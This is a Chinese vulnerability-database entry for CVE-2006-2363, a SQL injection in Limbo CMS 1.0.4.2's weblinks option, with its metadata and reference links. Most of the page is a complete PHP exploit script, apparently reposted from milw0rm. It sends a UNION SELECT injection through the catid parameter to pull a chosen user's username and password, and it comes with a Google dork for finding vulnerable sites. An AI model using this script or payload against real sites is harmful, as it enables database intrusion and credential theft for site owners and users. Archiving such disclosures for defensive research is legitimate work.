Limbo CMS weblinks选项 SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110217 漏洞类型 配置错误
发布时间 2006-05-05 更新时间 2006-05-15
CVE编号 CVE-2006-2363 CNNVD-ID CNNVD-200605-273
漏洞平台 PHP CVSS评分 5.1
|漏洞来源
https://www.exploit-db.com/exploits/1751
https://www.securityfocus.com/bid/83938
https://cxsecurity.com/issue/WLB-2006050090
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200605-273
|漏洞详情
LimboCMS的weblinks选项(weblinks.html.php)存在SQL注入漏洞。远程攻击者可以借助catid参数执行任意SQL指令。
|漏洞EXP
<pre>
[i] Limbo CMS (option=weblinks) sql injection exploit
[i] coded by [Oo]
<?php

if( (!isset($_GET['host'])) || (!isset($_GET['path'])) || (!isset($_GET['id'])))
{
?>	
[*] Usage: <?echo htmlentities($PHP_SELF)?>?host=[hostname]&path=[limbo_path]&id=[user_id]
[*] Exemple: <?echo htmlentities($PHP_SELF)?>?host=127.0.0.1&path=/limbo&id=1

[g] Google: inurl:"index2.php?option=rss" OR "powered By Limbo CMS"	
<?php
die;
}

$host = $_GET['host'];
$path = $_GET['path'];
$id = $_GET['id'];

$success = 0;

$fp = fsockopen($host, 80, $errno, $errstr, 30);
if (!$fp) {
   die("[-] Connection Error!");
} 
else {

   $out = "GET $path/index.php?option=weblinks&Itemid=44&catid=-1%20union%20select%200,1,2,concat(char(0x6c,0x6f,0x67,0x69,0x6e,0x3a),username,char(0x20,0x70,0x61,0x73,0x73,0x77,0x6f,0x72,0x64,0x3a),password),4,5,6,7,8,9,10,11%20from%20lm_users%20where%20id=$id/* HTTP/1.1\r\n";
   $out .= "Host: $host\r\n";
   $out .= "Connection: Close\r\n\r\n";

   fwrite($fp, $out);
   while (!feof($fp)) {
	   $f = fgets($fp, 1024);
       if ( (preg_match("/<div class=\"componentheading\" >/",$f)) && (preg_match("/login/",$f)) )
       {
			echo "$f";
			echo "[+] Enjoy! :><br>";
			$success = 1;
	   }
   }
   fclose($fp);
   
   if (!$success)
	echo "<br>[-] exploit failed :<<br>";
}
?> 
</pre>

# milw0rm.com [2006-05-05]
|受影响的产品
Limbo CMS Limbo CMS 1.0.4.2
|参考资料

来源:SECUNIA
名称:19891
链接:http://secunia.com/advisories/19891
来源:forum.limboforge.org
链接:http://forum.limboforge.org/index.php?topic=6.0
来源:XF
名称:limbocms-index-sql-injection(26366)
链接:http://xforce.iss.net/xforce/xfdb/26366
来源:BUGTRAQ
名称:20060507LimboCMS(option=weblinks)SQLinjectionexploit
链接:http://www.securityfocus.com/archive/1/archive/1/433221/100/0/threaded
来源:MILW0RM
名称:1751
链接:http://milw0rm.com/exploits/1751
来源:SREASON
名称:893
链接:http://securityreason.com/securityalert/893